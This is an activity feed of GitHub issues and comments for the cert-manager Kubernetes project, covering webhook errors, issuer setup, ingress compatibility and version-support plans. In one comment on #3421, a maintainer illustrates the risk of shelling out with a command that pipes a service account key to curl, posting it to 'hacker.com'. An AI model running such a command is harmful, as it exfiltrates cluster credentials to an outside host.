MTU Change:
[code]

[2020-10-18 15:51] victorpalmeida commented on #2969
I have the same problem, however I created the issuer service account and secret in the default namespace. I am following this [documentation](https://learn.hashicorp.com/tutorials/vault/kubernetes-cert-manager) almost to the letter.

[code]

[2020-10-18 17:49] evilezh commented on #2166
Can we just take last element of array ... if that is a chain, then root CA is always the last one.

[2020-10-18 19:10] RobTheArchitect opened #3395 "Webhook resoling wrong service name"
Deployed cert manager in Azure AKS and calio networking. installed by downloading the latest yaml because I had to make a change to the deployment to add nodeselector/os=linux. anyways while creating a ClusterIssuer

apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
  name: letsencrypt-prod
spec:
  acme:
    email: *****
    server: https://acme-v02.api.letsencrypt.org/directory
    pri

[2020-10-19 06:28] bryancalvobenoit commented on #2197
Hello,
I am getting into this issue k8s version `1.16.15` cert-manager helm chart version:` v1.0.3` and `installCRDs` set to `true`

[2020-10-19 07:46] C3po23 commented on #3273
Hello @meyskens

The problem came from the nexus server, it needed a little patch to work ...

As fo rnow everything is OK

[2020-10-19 07:46] #3273 closed

[2020-10-19 08:42] lenkeybalis commented on #3394
The problem has been solved by me. The problem was the following:

There was a search domain section in /etc/resolv.conf. I just edit the netplan configuration file, and I just removed the search domain section in the file.

$ netplan apply

I repeat these steps on each nodes, and finally I restarted the cert-manager pods and  nginx controller too.
After these steps the cluster issuer creation was

[2020-10-19 08:42] #3394 closed

[2020-10-19 09:02] ivanboykoatitv commented on #3239
Thanks for the note about Helm version.
I had the same issue, and it was fixed by upgrading helm 3.2.3 -> 3.3.4

[2020-10-19 10:15] naphta commented on #2763
I'm still happy to have a go at this with a bit of advice on roughly where to start from an implementation point of view since something generic to support many resource definitions being read is desired.

[2020-10-19 11:05] kim-sardine commented on #2640
thank you @rsliotta . real life saver.

[2020-10-19 11:15] skone commented on #3395
Have you got some rogue ValidatingWebhookConfigurations and MutatingWebhookConfigurations laying around?

[code]

If you do, delete them

[code]

 and then try re-applying

[2020-10-19 13:47] RobTheArchitect commented on #3395
worked like a charm. Thank You

[2020-10-19 13:47] #3395 closed

[2020-10-19 15:34] monomosc commented on #3390
Hi, we recently ran into this problem with the latest version of https://github.com/kubernetes/ingress-nginx/releases/tag/controller-v0.40.0. Note:

[code]

This makes cert-manager incompatible to 0.40+ of what I would call the "standard" ingress controller.

Error that occurs in cert-manager:
[code]

Error as in ingress-nginx:
[code]

[2020-10-19 15:57] jetersen commented on #2667
Tried installing `v1.1.0-alpha.0` to no avail. Still having to downgrade to v0.15.2

[2020-10-19 16:18] jetersen commented on #2667
Issue might be related to forgetting to upgrade apiVersion on cluster issuer:

[code]

[2020-10-19 17:45] adrianchifor opened #3396 "renew-before-expiry-duration flag is ignored, causing CertificateRequest explosion if cert duration is <= 30d"
**Describe the bug**:
We're using cert-manager with the Vault issuer and we set the cert duration to 30d. `renew-before-expiry-duration` defaults to 30d which causes an explosion of `CertificateRequest` objects (50k in 1 month) as the renew == duration.

We're also using the ingress shim which creates the `Certificate` objects without a duration or renewBefore, and we can't set a renew option thro

[2020-10-20 07:55] elonzh commented on #3133
@meyskens the document does not help for this issue, the wordload status is healthy, and the caBundle is updated and I checked the caBundle in `validatingwebhookconfigurations/cert-manager-webhook` is identical with the `secret/cert-manager-webhook-ca`.

[code]

![image](https://user-images.githubusercontent.com/8749411/96556745-f57a9c80-12eb-11eb-8d66-caaab604f505.png)

[2020-10-20 21:00] bbearce commented on #2487
Me as well. I feel like I have to install every cert-manager with every nginx-ingress till one works.

[2020-10-21 01:01] whereisaaron commented on #2538
Further to this, I have found that adding the annotation `acme.cert-manager.io/http01-ingress-class` to the Ingress does not work if there is an existing order or cert, it will keep creating challenge ingresses with no `kubernetes.io/ingress.class` annotation at all. Sometimes deleting the pending order is enough, but sometimes we have found we have to delete the certificate resource so that it ge

[2020-10-21 13:11] nikhileshva opened #3402 "Two CertificateRequest are created if I specify my custom CertificateRequest"
So I'm creating a CertificateRequest with my own CSR. The creation is successful. However when I try to create Certificate, it creates another CertificateRequest and doesn't use the one that I created before.

Do I need to add some annotations to my CertificateRequest or Certificate for them to recognise each other?

[2020-10-21 14:23] raphink opened #3404 "Add support for custom Certificate Extensions"
In some cases, certificates require more extensions than simple key usages. It would be useful to allow custom Certificate Extensions in the `Certificate` API. These extensions would then be added to the `CertificateRequest` (and encoded in the PEM) to be passed to the CA.

Questions from @munnerz on Slack:

1) Is there any need to define ‘friendly names’ for OIDs? i.e. so people configuring Certi

[2020-10-21 14:25] raphink commented on #3404
On 1: in my case, I aim to support Puppet extensions, as described in https://puppet.com/docs/puppet/5.5/config_file_csr_attributes.html#puppet-specific-registered-ids . Nice names would be definitely be, well… nice, but the list might get quite large.

On 5: Yes. In Puppet, the extensions are added to the CSR and the CA decides if it accepts to sign them or not.

[2020-10-21 14:33] brunovlucena commented on #675
volumes:
        - name: cert-name-foo
          secret:
            secretName:cert-name-foo
            items:
            - key: ca.crt
              path: ca.crt
            - key: tls.crt
              path: transport.tls.crt
            - key: tls.key
              path: transport.tls.key

[2020-10-22 01:37] ttyS0 opened #3406 "cluster issuer creation fails"
**Describe the bug**:
On a fresh install of cert-manager v1.0.3, trying to create a ClusterIssuer fails with an internal server error.

[code]

**Expected behaviour**:
The ClusterIssuer be created.

**Steps to reproduce the bug**:
Perform an install of cert-manager via the manifest method using the v1.0.3 cert-manager.yaml.

**Anything else we need to know?**:

There are a lot of reflector errors

[2020-10-22 07:18] krmayankk opened #3407 "ca-key-pair documentation is not clear where it should be created"
**Describe the bug**:
I followed documentation here https://github.com/jetstack/cert-manager/blob/release-0.8/docs/tasks/issuers/setup-ca.rst which is probably the same as the documentation here https://docs.cert-manager.io/en/release-0.8/tasks/issuers/setup-ca.html .  This led to the ca-key-pair secret being created in the default namespace . I also followed documentation to install cert-manager

[2020-10-22 08:53] meyskens commented on #3407
You're following our very old documentation for version 0.8.
if it is still unclear on the new documentation at https://cert-manager.io/ I recommend to file an issue against our website repo at https://github.com/cert-manager/website/

/close

[2020-10-22 08:53] #3407 closed

[2020-10-22 08:55] meyskens commented on #3406
/remove-kind bug
/triage support

I recommend taking a look at https://cert-manager.io/docs/concepts/webhook/#diagnosing-other-webhook-problems

[2020-10-22 09:03] meyskens commented on #3402
~~You can set the owner reference to your certificate~~, however cert-manager isn't meant to be used that way and it might cause more issues than you want.
(EDIT: I just realised that is not possible as cert-manager doesn't have the private key of your CSR it cannot do anything with that cert)
If you use the CertificateRequest API directly that is possible and done by many use cases (like the CSI

[2020-10-22 09:04] meyskens commented on #3149
/reopen

GitHub mistakenly closed this one

[2020-10-22 10:02] meyskens commented on #3396
[code]

We do check if the cert not after is larger that the renewBefore and fall back to 1/3rd of the lifetime however i feels like clock drift causes you to get certs valid for 29.99 days which is causing this issue...

I looked into why this flag was broken and it is used till https://github.com/jetstack/cert-manager/blob/0cb8cf66fbd2861d995b556a3c651c5d2306c253/pkg/controller/helper.go#L46

wh

[2020-10-22 12:54] monomosc commented on #3390
I can maybe create an MR that throws away support for K8S <1.14. Work for supporting the old extensions/v1beta1 Ingress as well as the new apiVersion would require a config switch. Your call.

[2020-10-22 13:24] rittneje opened #3408 "Upgrading from k8s 1.14 to 1.15 using v0.14.0"
We have a k8s 1.14 cluster using v0.14.0 of cert-manager. As such, we installed it using the legacy yaml file. We are now upgrading to k8s 1.15. Of course, applying the legacy yaml no longer works, so we plan to switch to applying the regular yaml. Is there anything special we need to do for this? Do we need to manually delete the old CRDs, etc.? Or will applying the regular yaml take care of ever

[2020-10-22 14:21] meyskens commented on #3408
/triage support

You can still use the legacy CRDs if you want to, in v1.0 Kubernetes 1.15 is the legacy version again.

[2020-10-22 16:24] meyskens commented on #3390
Removing 1.14 and below isn't really an option, you are able to dynamically query the API server for support so a config flag isn't needed.

[2020-10-22 16:41] meyskens commented on #3390
i have an idea in my head, trying something out

/assign

[2020-10-22 16:42] meyskens commented on #3390
We need to support 3 versions, extensions/v1beta1 networking/v1beta1 and networking/v1

[2020-10-22 20:56] pwplusnick commented on #646
@jjtroberts I did not meet the requirements for API access. I cannot remember the exact one; it may have been the static IP address requirement, but I cannot say for certain. I tried to convince their customer service to grant me API access to work on this project, but they were not willing to do so. Without API access, I was unable to write the necessary code.

[2020-10-22 21:23] rittneje commented on #3408
I am trying to avoid upgrading cert-manager itself as part of this, especially because [it's complicated](https://cert-manager.io/docs/installation/upgrading/upgrading-0.16-1.0).

[2020-10-22 22:25] TylerIlunga commented on #2602
Update from [previous solution](url)
Steps taken:
[code]

[2020-10-23 14:13] meyskens opened #3413 "Kubernetes Deprecation Timeline"
**Is your feature request related to a problem? Please describe.**

We currently support back to Kubernetes 1.11, especially because OpenShift 3.11 still has 4 years of support to go.
This causes us a lot of pains that could be improved:
* legacy version
* 2 CRD versions
* 2 webhook versions
* https://github.com/jetstack/cert-manager/pull/3364 which adds 2 cainjector versions
* 3 ingress versions

[2020-10-23 16:29] munnerz commented on #3408
I don't think we can help you *avoid* upgrading 😄 as noted, you should be able to go ahead and update, continuing to use the 'legacy' variant of the CRDs.

If there's a specific issue you are running into with the upgrade process, please open an issue! 😄

[2020-10-23 16:29] #3408 closed

[2020-10-23 16:30] munnerz commented on #3402
This is working as intended - you either want to manually create a CertificateRequest resource, *or* create a Certificate resource and have cert-manager manage this for you.

There isn't a way to have cert-manager 'adopt' a CertificateRequest, and it wouldn't make much sense to support this functionality either. Hope that helps! 😄

[2020-10-23 16:30] #3402 closed

[2020-10-23 16:35] munnerz commented on #3392
We do have tests that act on this level already, notably during our end-to-end suite: https://github.com/jetstack/cert-manager/blob/b6c3bc4b466c075c027661806bb91a17fb0b4c5d/test/e2e/framework/helper/certificates.go#L97-L100

There's also various [other checks](https://github.com/jetstack/cert-manager/blob/b6c3bc4b466c075c027661806bb91a17fb0b4c5d/pkg/controller/certificaterequests/ca/ca_test.go#L33

[2020-10-23 16:35] #3392 closed

[2020-10-23 16:41] munnerz commented on #3391
This isn't something we want to change, nor is it something we _can_ change at this point (regardless of what some bits of software do).

The norm is for `tls.crt` to contain a chain up to a trusted root (the `ca.crt`), and that's ultimately the way that cert-manager does issue certificates.

I'm going to close this as ultimately it is a dupe of the issue you referenced #843.

If we were to make t

[2020-10-23 16:41] #3391 closed

[2020-10-23 17:12] rittneje commented on #3408
@munnerz Sorry, but that's not a useful answer to my question. Please reopen this issue.

[2020-10-23 18:21] ttyS0 commented on #3406
It appears that I do not have a `secret/cert-manager-webhook-tls` secret. How is that supposed to be generated?

[code]

[2020-10-23 18:43] nabsul commented on #3238
Hi all. Has there been any news on this issue? I gave up on looking for a solution and instead figured out how to manually renew Let's Encrypt certs in Kubernetes.

In case any of your are still stuck, I've shared code and instructions to do this here: https://github.com/nabsul/k8c-letsencrypt

The instructions are long for the sake of clarity, but it's actually not that bad to do it manually.

[2020-10-23 20:56] compumike commented on #3341
Hi @Serrvosky, I've just published `hairpin-proxy` which works around the issue, specifically for cert-manager self-checks. https://github.com/compumike/hairpin-proxy

It accomplishes basically what you described: adding a PROXY line to requests originating from within the cluster. This allows cert-manager's self-check to pass.

[2020-10-23 20:58] compumike commented on #656
Hi all, I ran into the same issue. I've just published `hairpin-proxy` which works around the issue, specifically for cert-manager self-checks. https://github.com/compumike/hairpin-proxy

It uses CoreDNS rewriting to intercept traffic that would be heading toward the external load balancer. It then adds a PROXY line to requests originating from within the cluster. This allows cert-manager's self-c

[2020-10-23 21:03] compumike commented on #466
Hi all, I ran into the same issue. I've just published `hairpin-proxy` which works around the issue, specifically for cert-manager self-checks. https://github.com/compumike/hairpin-proxy

It uses CoreDNS rewriting to intercept traffic that would be heading toward the external load balancer. It then adds a PROXY line to requests originating from within the cluster. This allows cert-manager's self-c

[2020-10-24 02:52] nabsul commented on #656
What a coincidence. Just today I published https://github.com/nabsul/k8s-letsencrypt with instructions on how to manually issue certificates in your Kubernetes cluster. The hope being that I'll only need to manually issue certs a few times until this issue is fixed.

I wish I'd seen @compumike 's solution sooner!!

[2020-10-24 17:12] ponderMuse commented on #2842
I am trying to resolve similar issue in a local setup which is setup as follows:

www -> public IP:80 -> router firewall -> ingress-nginx-controller:30080 -> ing -> svc -> pod

Here, my ingress controller's service is of type `NodePort` and it is accessed via port `30080` instead of port 80.

What type of configuration would I need to setup in order for cert-manager to be able to reach my service'

[2020-10-26 13:32] marcellodesales opened #3414 "cert-manager: Referenced "Issuer" not found: issuer.cert-manager.io "letsencrypt-prod" not found: when it does exist"
**Describe the bug**: Can't get a certificate with clusterissuer.

* This is an EKS cluster
* Using DNS01 with route53
* Cluster Certificate exists

## Self-signed certs working as expected

* Created and validated with the tests provided for self-signed

[code]

## Cluster Issuer created

* Using letsencrypt
* DNS01 through Route53

[code]

## Ingress Controller changes

* Created an app

[code]

[2020-10-26 13:38] marcellodesales commented on #3414
# Found the issue

* The annotation in the ingress is using the wrong class as described in https://stackoverflow.com/questions/58553510/cant-get-certs-working-with-cert-manager/58592838#58592838

* The correct should be the clusterissuer

[code]

* After changing, everything is working...

[code]

[2020-10-26 13:38] #3414 closed

[2020-10-26 14:06] haskell42 opened #3415 "Webhook API-call: Forbidden"
**Describe the bug**:
After a seemingly successful installation of cert-manager we are unable to create a cluster issuer using the following issuer.yaml:

[code]

Applying the issuer.yml via kubectl leads to the following error:

`Error from server (InternalError): error when creating "issuer.yml": Internal error occurred: failed calling webhook "webhook.cert-manager.io": Post "https://cert-manage

[2020-10-27 05:40] #3370 closed

[2020-10-27 07:06] slaschinski commented on #641
It's quite an old issue, but just in case someone else stumbles upon this:
If you have a `search`-line in your `resolv.conf` on the worker node, this is also appended to the `resolv.conf` within any container on that node. For some reason the resolver tries to append the "search-domains" before trying to resolve the actual domain. So if you have for example this line in your resolv.conf:
`search e

[2020-10-27 10:32] ludovicMercier opened #3416 "Certificate stuck on order due to certificateRequest controller"
**Describe the bug**:
Randomly certificaterequest controller try to create twice the same order. It has as effect to stuck the process.
The cert-manager try and retry indefinitely to create an order that already exist.

**Expected behaviour**:
Not to be stuck, if order already exist the process should continue to the next step.

** describe certificate request ** :
[code]

**describe certificate *

[2020-10-27 14:57] meyskens commented on #3370
I see you closed this issue, would you mind sharing how you fixed it for people who stumble upon this?

[2020-10-27 14:58] meyskens commented on #3415
Any logs in the cert-manager-webhook pod? I find this a very weird error to receive as i don't think we send that one

[2020-10-27 15:01] meyskens commented on #3416
That is a very weird situation, did you see anything in the logs on why it triggered this? Can you also get us a describe on the order itself?

[2020-10-27 15:07] meyskens commented on #3406
this gets added by the webhook, worth checking the logs there

[2020-10-27 16:39] ttyS0 commented on #3406
That's the part that's confusing. It appears to be "fine". I've recycled the webhook pod just to see if that makes any difference. The log entries remain the same. 😭

[code]

[2020-10-27 17:57] james-w commented on #3413
Is 1.16 the choice purely because of Kubernetes support policies, or does that also line up so that we can drop various bits of compatibility because of that choice? i.e. if it were to be 1.14 that we supported would that change the effort required to maintain compatibility beyond just testing 2 extra versions?

I think that we would be on firm ground to only support k8s versions that are supporte

[2020-10-27 18:00] matthiasbaldi commented on #3335
I have the same problem.
But my files are looking a bit different.

[code]

My certificate definition looks "raw" a bit different, because I try to use pulumi for that.

[code]
I can deploy and serve the webapp without any problems but the certificate gets never ready:

[code]

[2020-10-28 03:56] fuine6 commented on #1181
I verify the same DNS name in two clusters. One of the records will be overwritten and will not be retried. Is it possible to add a retry or other solution?

[2020-10-28 04:44] ankitsoni17-png commented on #3370
Hi @meyskens
I was trying to deploy Rancher using cert-manager. The cert-manager was deployed successfully but when I was deploying Rancher using helm then this issue occur.
Later I debugged further and find the below issue in cainjector pod.
[code]
The problem was with Clusterrole "rancher-cert-cert-manager-cainjector" created for serviceaccount by cert-manager. The serviceaccout mapped with this

[2020-10-28 08:42] ludovicMercier commented on #3416
Hi,
I agree, really weird, and finally 24h  later everything get back in order. The orders who didn't have any events suddenly create the challenge and the missing certificate are now there.

Below a fresh describe of the order generated yesterday.

** describe of the order ** :
 Type    Reason    Age   From          Message
  ----    ------    ----  ----          -------
  Normal  Created   36m

[2020-10-28 08:56] meyskens commented on #3413
1.16 is not only because it lines up with the Kubernetes policy but this is a list of things we need from Kubernetes 1.16
* CRD v1, added in 1.16
* AdmissionWebhooks v1 added in 1.16
* Conversion webhooks added in 1.15
* networking.k8s.io/v1beta1 added in 1.14

1.16 already is our minimum version for non-legacy, choosing 1.16 will allow us to drop the legacy deployment and all hacks we added to su

[2020-10-28 09:03] meyskens commented on #3416
Will close it, please /reopen if you see it happening again!

/close

[2020-10-28 09:03] #3416 closed

[2020-10-28 09:06] meyskens commented on #3390
After a long discussion with many people here is an update

* supporting all versions will be a pain, #3413 will bring an end to this
* ingress-nginx will be supporting extensions/v1beta1 again in the next release, we'll be helping out where needed and put in a policy for cert-manager to deprecate its use

[2020-10-28 09:16] james-w commented on #3413
I think that's a reasonable choice. I would be interested to hear from anyone that requires support for an older version.

[2020-10-28 09:23] meyskens commented on #3413
@james-w feedback welcome from those people! Keep in mind we still support those versions just not with new features ;)

[2020-10-28 09:25] meyskens commented on #3335
@matthiasbaldi seems some HTML page is server on your challenge... worth checking your ingress setup

[2020-10-28 09:28] meyskens commented on #3406
is the error still `context deadline exceeded`? That feels like a firewall issue or a networking issue where it blocks or cannot reach the service IP

[2020-10-28 09:30] meyskens commented on #3415
Have you tried accessing the webhook URL from the Kubernetes controller node?

[2020-10-28 09:36] james-w commented on #3413
Well, I'm interested in the feedback because we may not have the LTS release.

[2020-10-28 09:37] meyskens commented on #3404
Thinking a bit further about policy use here. So in the near future we plan to be able to do policy validation in the `Certificate` resource created by developers. Checking the domains, checking the key usages etc. However this PR will make it quite hard/impossible to add this. It would require parsing OIDs, you can put in an OID value for a DNS SAN that policy logic might miss by crafting it in t

[2020-10-28 09:45] coderanger commented on #3413
I think an important question might be what would issues look like that would be candidates for an LTS backport, and could things be organized to limit the surface area of those? It seems like most critical security issues would be in the issuers rather than the core plumbing? Or at least those are the things that most likely talk to non-timelocked services and so need ongoing care and feeding. Ma

[2020-10-28 09:50] meyskens commented on #3413
@james-w what do you mean by `we may not have the LTS release.`?

@coderanger `could things be organized to limit the surface area of those` the surface area for those is what we would consider a patch release right now, so no breaking changes, no features, and an upgrade path that just involves replacing the binary.

[2020-10-28 09:53] james-w commented on #3413
As I understand it the proposal is to support 1.16+ in the new releases, and to declare and LTS release that receives
critical fixes for 1.11+.

We could instead have a scheme where we support 1.16+ in new releases, and that is it. If k8s don't support 1.15-
then there's an argument that we don't have to.

[2020-10-28 09:57] meyskens commented on #3413
This gets into: do we want to support OpenShift 3.11 which is still in support till 2024.
If we do this it will be v1.1 LTS meaning we will allow backported bug fixes into 1.1.1/1.1.2/1.1.3/... long after v1.2 is released

[2020-10-28 10:03] meyskens commented on #3383
2048... sorry small typo

[2020-10-28 11:19] bryanhorstmann commented on #3413
Maybe also consider the current `stable` version of Kubernetes available on the three major cloud providers before deprecating a release.

Current stable version on GKE (as an example) is `1.16.13`.

[2020-10-28 11:28] haskell42 commented on #3415
This is a single node cluster in an air-gapped environment, managed by rancher.
We have three nodes: Node 1 + Node 2 => The rancher cluster.
Node 3: The application cluster we try to install cert-manager on.

Installing cert-manger in the rancher-cluster (Node 1 & Node 2) leads to the same effect.

The web hook service is always reachable:

[code]

[2020-10-28 11:34] haskell42 commented on #3415
I am able to get cert-manager running in a local VM using the same OS and K3s versions (cluster not managed by rancher, node connected to the internet). The problem does not seem to be related to K3s.

[2020-10-28 11:45] raphink commented on #3404
OK. Can you think of another way of implementing this?

[2020-10-28 13:36] meyskens commented on #3404
The key usages in the end are also OIDs that exist in the codebase but are served as a very simple API, which is also exactly how Kubernetes surfaces these https://github.com/kubernetes/api/blob/master/certificates/v1/types.go
This requires a lot of changes for a quite edge case scenario

[2020-10-28 14:01] meyskens commented on #3415
No idea what is causing this... especially since it works on the test env

/triage support

[2020-10-28 14:03] meyskens commented on #3388
Seems to be network related especially `TLS handshake error from 10.42.0.0:35129: local error: tls: bad record MAC` worries me

/triage support
/remove-kind bug

[2020-10-28 14:12] meyskens commented on #3393
Good catch! Created a patch, will be in the next patch release

[2020-10-28 16:25] ttyS0 commented on #3406
The error in the `cert-manager` Pod is not being able to connect to the `https://cert-manager-webhook.cert-manager.svc:443` Service endpoint. Which I suppose makes sense if there's a missing certificate somewhere.

snip from `kubectl logs -n cert-manager cert-manager-65586db56f-jlbxx`

[code]

The `context deadline exceeded` comes from trying to create a `ClusterIssuer` config. My `cluster-issuer.

[2020-10-28 17:14] Roydon commented on #3335
My setup to worked after I added DNS record for `test.example.com` pointing to Ingress controller ELB.

[2020-10-28 17:14] #3335 closed

[2020-10-28 17:38] #3393 closed

[2020-10-28 20:55] matthiasbaldi commented on #3335
@meyskens thanks a lot for the tip.
I found it. You were so right. I am pretty sure that I set this argument a few days a ago, may I overwrote it somehow.
For traefik I had to set the following argument: `- --providers.kubernetesIngress.ingressClass=traefik-cert-manager`
Otherwise the ingress was not matching with the configuration for the ClusterIssuer.

Thank you 👍

[2020-10-29 01:50] s-newman commented on #834
I am also interested in the `caBundleSecretRef` field, and would be willing to help. The above init container workaround no longer works, unfortunately :(

[2020-10-29 02:06] mtneug commented on #3388
Do you use an HTTP proxy? If yes, https://github.com/rancher/k3s/issues/2176 might be the issue you are seeing. Until this change propagates to k3OS, setting `NO_PROXY` directly fixes the issue for me.

[2020-10-29 08:23] meyskens commented on #3289
Moving to 1.2 to drop support for v1beta1 webhooks

[2020-10-29 08:25] meyskens commented on #834
Can you open up a new issue for `caBundleSecretRef`? that makes it easier for us to track!

[2020-10-29 08:28] meyskens commented on #3365
/area deploy
/priority important-longterm

[2020-10-29 08:40] meyskens commented on #3381
/priority important-longterm

It is a good idea, currently there is some things that prevent this from being able to do that we hope to re-evaluate this once we fixed our repo structure on GitHub :)

[2020-10-29 08:45] meyskens commented on #3329
/remove-kind bug
/triage support

It looks like something in your network it MiTMing `acme-staging-v02.api.letsencrypt.org` and is injecting an invalid certificate.

[2020-10-29 08:48] meyskens commented on #3371
Refering to conversation in https://github.com/jetstack/cert-manager/pull/3372#issuecomment-713608512

[2020-10-29 09:12] meyskens commented on #2699
/close

[2020-10-29 09:12] #2699 closed

[2020-10-29 09:13] meyskens commented on #2694
Going to close this for now. As we don't have openshift specific features we should be fine for now with using Kubernetes. Running OpenShift in our test infra will be more of a burdon than a gain.

/close

[2020-10-29 09:13] #2694 closed

[2020-10-29 09:17] meyskens commented on #3406
Can you try to do a curl to that URL from a pod and from your kubernetes controller node?

[2020-10-29 09:29] meyskens commented on #3324
/area deploy
/priority important-longterm

You're right this was an oversight! Added this to our backlog, in meantime a PR would be very welcome!

[2020-10-29 09:32] meyskens commented on #3366
/priority important-longterm

[2020-10-29 09:33] meyskens commented on #3363
/area vault
/priority important-longterm

[2020-10-29 09:35] meyskens commented on #2920
Going to close this old issue as it seems the original question is fixed. I recommend others to check in the Kubernetes slack or file a new issue with the exact details.

/close

[2020-10-29 09:35] #2920 closed

[2020-10-29 09:35] stefandevo opened #3421 "Why not a acme.sh compatible DNS01 provider"
**Is your feature request related to a problem? Please describe.**
There is only a limited set of providers available for ACME DNS01.

**Describe the solution you'd like**
By supporting one more provider, based upon https://github.com/acmesh-official/acme.sh you add support to 120 more providers with a single implementation.

**Describe alternatives you've considered**
Building custom webhooks nee

[2020-10-29 09:39] meyskens commented on #3421
Question is how to supply the required tokens, some need one others 3. How would we also handle errors properly on these?
Last point... i don't think shelling out in our containers will be a good solution... we are looking into how https://github.com/kubernetes-sigs/external-dns can help us expand our DNS providers which is more Kubernetes native than a bash script.

[2020-10-29 09:44] meyskens commented on #843
@GrandChaman hey can you file a separate issue for that? that will make it easy to track and assign this!

[2020-10-29 09:46] meyskens commented on #3360
/remove-kind bug
/triage support

Can you look at your ingress resources? seems for some reason the ingress for the `well-known/acme-challenge/..` path is not getting propagated.

[2020-10-29 09:47] meyskens commented on #3025
/close

[2020-10-29 09:47] #3025 closed

[2020-10-29 09:56] stefandevo commented on #3421
I just found https://github.com/math-nao/certs which solves this by using args variables

The custom webhook is complicated in my opinion when you can add 120 providers in one implementation.

[2020-10-29 09:56] meyskens commented on #3237
Going to close this as we cannot to much about it.
If somebody can make a documentation PR that would be great!

/close

[2020-10-29 09:56] #3237 closed

[2020-10-29 10:02] meyskens commented on #2918
Going to close this one as it doesn't seem cert-manager related. Feel free to /reopen if needed.
If you think it could be a useful thing to document PRs to the documentations are always open!

[2020-10-29 10:02] meyskens commented on #2918
/close

[2020-10-29 10:02] #2918 closed

[2020-10-29 10:20] meyskens commented on #3421
This still doesn't solve the issue about error handling, security risks for shelling out (`TOKEN=$(cat /var/k8s/serviceaccountkey | curl https://hacker.com -X POST) `) or any validation that we can do now checking provided credentials are valid.

I agree that the webhook solution is far from perfect and we are working improving it, but I do not think using acme.sh is a good idea for cert-manager.

[2020-10-29 10:29] meyskens commented on #3293
@kaypeter87 surfacing of rate limit issues is improved in v1.1

[2020-10-29 11:17] jjacob27 opened #3422 "Certificate not issued - clusterissuer showing ready, whereas certificaterequest complaining issuer not ready."
**Describe the bug**:
My certificate is not getting issued. The certificate is showing the READY = false
[code]

Here is the certificate
[code]

When I examine the certificate-request, this is what it tells me
[code]
**Note the above output, it says that "Waiting on certificate issuance from order ..." and it also says "IssuerNotReady". I checked the issuer using the following command**
[code]
The

[2020-10-29 11:49] jjacob27 commented on #3422
I removed the entire set of Certificate, CertificateRequests, Orders, ClusterIssuers and the whole of the cert-manager. Verified that there are no stale CRDs. Then reinstalled the whole thing again... Still the same issue.

[2020-10-29 12:10] tekspacedemo opened #3423 "Issue requesting certificate in cert-manager 1.0.3"
Hi,

I was trying to request certificate in staging environment and observed that the `acme challenge` pod had an issue completing the request. Please see the below log for more details.

[code]

Here is the log for certificate for more details:

[code]

Any suggestion what may have caused this issue? It appears that the challenge was successfully, but had an issue processing the request.

[2020-10-29 12:58] jjacob27 commented on #3422
It magically started working for me.. and i have no clue why it started working after waiting for some time... would it be linked to DNS propogation?

[2020-10-29 13:12] tekspacedemo commented on #3423
I deleted order, certificaterequest, and certificate and retried it one more time. It worked this time? Is there an issue with acme-challenge pod? I wish I could trace the pod logs but they get deleted once the execution completes.

[2020-10-29 13:41] meyskens commented on #3423
I suggest taking a look at https://cert-manager.io/docs/faq/troubleshooting/

Since it is fixed i will close this issue.

/triage support
/close

[2020-10-29 13:41] #3423 closed

[2020-10-29 14:40] stefandevo commented on #3421
Ok. Last try :-) What about this project: https://go-acme.github.io/lego/ this has also a lot of providers, and it's not bash; this is actually used by Traefik for example.

Another question: would it be possible to create a web hook in another language than Go?

[2020-10-29 18:16] timothyclarke commented on #3021
I'm using cert-manager v0.12.0. This is working when I use the Global API key from the admin account.
I'd prefer to swap over to `apiTokenSecretRef` and use a more restricted API Token, however I keep getting `* spec.acme.solvers.dns01.cloudflare.apiKeySecretRef: Required value`
I'm using `apiVersion: cert-manager.io/v1alpha2`

[2020-10-29 19:10] sgringwe commented on #2602
Potential resolution:

In our case, our cert-manager-webhooks pod had been running for nearly a year. We suspect it was using some sort of out-of-date internal cluster cert. After deleting the webhook pod, the Deployment spun up a new one without the issue.

[2020-10-29 19:19] s-newman opened #3424 "Allow Vault Issuers to reference a CA bundle specified elsewhere"
**Is your feature request related to a problem? Please describe.**
When creating an Issuer for a Vault server, if Vault's API endpoint uses HTTPS and the certificate is signed by an untrusted CA (e.g. internal/corporate), then the CA bundle must be hard-coded into the Issuer manifest.

**Describe the solution you'd like**
A field could be added to `Issuer.spec.vault` that references a ConfigMap or

[2020-10-29 19:38] paolomainardi commented on #1462
Is this solution works also when using http challenge validation ?

[2020-10-29 19:54] arkadijs commented on #1462
It works for me - both with http and dns solvers. The first (shorter than 64 chars) element in `hosts` is resolvable in DNS and is routable to the same ingress controller. Solver pods created by cert-manager gets traffic from the Let's Encrypt and validation is performed successfully.

[2020-10-29 20:14] paolomainardi commented on #1462
Ok perfect, so the first name should be always http resolvable, it means to always carry on both domains. Thanks for letting me know.

[2020-10-29 20:23] s-newman commented on #3424
Upon further investigation, this looks like a duplicate of #1437, which was closed due to inactivity. Sorry for the extra noise in your issue feed :grimacing:

[2020-10-30 02:20] s-newman commented on #3338
I just ran into this issue, and I patched the ClusterRole with the following rule to access `configmaps`:

[code]

Note that if you're using Kustomize, you'll have to provide all the required permissions because the patch will replace the `rules` in the ClusterRole, instead of appending the new rule to the list. [Here's a gist](https://gist.github.com/s-newman/57256ff5c207d21c33e97829b264ca47) of

[2020-10-30 04:18] ankitsoni17-png commented on #3338
Hi @johanbrandhorst
It is mandatory to patch the clusterrole because it is expecting access on configmaps. So to make it work smoothly, you have to add the configmaps part in clusterrole.

[2020-10-30 09:27] strus38 opened #3426 "UBI images support - few PRs on it, and not a clear status"
Hi

We are planning to deploy cert-manager on our K8S cluster, however, we have a hard requirement on only using ubi8 (redhat) images on this platform.
I have seem a PR where the support was added, and then another more recent on which this support was removed.
Could you please tell me if it is possible to use ubi8 images for cert-manager?
Thanks

[2020-10-30 09:34] meyskens commented on #3426
These moved to https://github.com/jetstack/cert-manager-olm/
This is currently a few versions behind due to a bug in Helm/Kubernetes, we will be updating them to 1.1 soon

/close

[2020-10-30 09:34] #3426 closed

[2020-10-30 09:42] meyskens commented on #3421
We have been looking into creating a lego webhook, it requires some changes in our webhook code to make it possible, but is is on the idea list to make as an addon.

yes! for sure! We don't have example code for it but nothing limits you to use Go

[2020-10-30 09:44] stefandevo commented on #3421
Ok thanks. I only need to understand what is the entry for such a web hook ; I understand the interface it expects, but is this some kind of API rest call you need to implement in for example .net ?

[2020-10-30 09:44] meyskens commented on #3021
@timothyclarke this got solved in newer releases of cert-manager

[2020-10-30 12:18] remikj opened #3427 "Add multiple trustedCertEntries to truststores."
